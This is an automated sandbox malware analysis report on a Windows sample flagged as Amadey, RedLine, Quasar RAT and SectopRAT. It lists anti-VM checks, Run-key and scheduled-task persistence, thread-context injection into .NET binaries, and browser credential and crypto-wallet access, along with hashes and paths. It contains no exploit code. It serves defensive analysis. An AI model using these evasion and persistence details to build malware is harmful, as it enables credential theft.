Malware Analysis Report

2024-10-19 08:35

Sample ID 240731-bfvc3ssgkc
Target 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
SHA256 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4
Tags
amadey 0657d1 discovery evasion trojan quasar redline sectoprat exodusmarket.io fed3aa office04 credential_access infostealer persistence rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4

Threat Level: Known bad

The file 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe was found to be: Known bad.

Malicious Activity Summary

amadey 0657d1 discovery evasion trojan quasar redline sectoprat exodusmarket.io fed3aa office04 credential_access infostealer persistence rat spyware stealer

RedLine

Quasar payload

SectopRAT payload

Amadey

Quasar RAT

RedLine payload

SectopRAT

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Credentials from Password Stores: Credentials from Web Browsers

Downloads MZ/PE file

Loads dropped DLL

Checks computer location settings

Checks BIOS information in registry

Executes dropped EXE

Identifies Wine through registry keys

Reads user/profile data of web browsers

Adds Run key to start application

Checks installed software on the system

Blocklisted process makes network request

Enumerates connected drives

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Browser Information Discovery

System Location Discovery: System Language Discovery

Program crash

Unsigned PE

Enumerates physical storage devices

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry class

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-31 01:05

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-31 01:05

Reported

2024-07-31 01:08

Platform

win7-20240704-en

Max time kernel

119s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\explorti.job C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe

"C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

Network

N/A

Files

memory/2688-0-0x0000000000E00000-0x00000000012B9000-memory.dmp

memory/2688-1-0x0000000076F70000-0x0000000076F72000-memory.dmp

memory/2688-2-0x0000000000E01000-0x0000000000E2F000-memory.dmp

memory/2688-3-0x0000000000E00000-0x00000000012B9000-memory.dmp

memory/2688-4-0x0000000000E00000-0x00000000012B9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

MD5 c015c231f5d013a7031748f95129a969
SHA1 27f74431dbaa7b8bd16a5ddc0b871da65ea62849
SHA256 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4
SHA512 baf6f0d3752e49ad769325bde85129d803094ea42e9d9735eafb3f415014e6d2f07a977d8892fef85307bc80e0060f0ef3c364ef3b6d05a0d4324956723a194e

memory/2688-14-0x00000000069F0000-0x0000000006EA9000-memory.dmp

memory/1096-15-0x0000000000920000-0x0000000000DD9000-memory.dmp

memory/2688-16-0x0000000000E00000-0x00000000012B9000-memory.dmp

memory/1096-19-0x0000000000920000-0x0000000000DD9000-memory.dmp

memory/1096-21-0x0000000000920000-0x0000000000DD9000-memory.dmp

memory/1096-18-0x0000000000921000-0x000000000094F000-memory.dmp

memory/1096-17-0x0000000002270000-0x0000000002271000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-31 01:05

Reported

2024-07-31 01:08

Platform

win10v2004-20240730-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe"

Signatures

Amadey

trojan amadey

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\471a98aee8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\471a98aee8.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a2f7c1badc.exe = "C:\\Users\\Admin\\1000029002\\a2f7c1badc.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\X: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1492 set thread context of 5748 N/A C:\Users\Admin\AppData\Local\Temp\1000056001\deepweb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 6300 set thread context of 8348 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6300 set thread context of 8164 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6300 set thread context of 8900 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6300 set thread context of 7992 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6300 set thread context of 9188 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6300 set thread context of 4228 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6300 set thread context of 8136 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6300 set thread context of 6276 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6300 set thread context of 6728 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6300 set thread context of 6620 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\explorti.job C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A
File created C:\Windows\Tasks\axplong.job C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\1000029002\a2f7c1badc.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\1000029002\a2f7c1badc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000056001\deepweb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
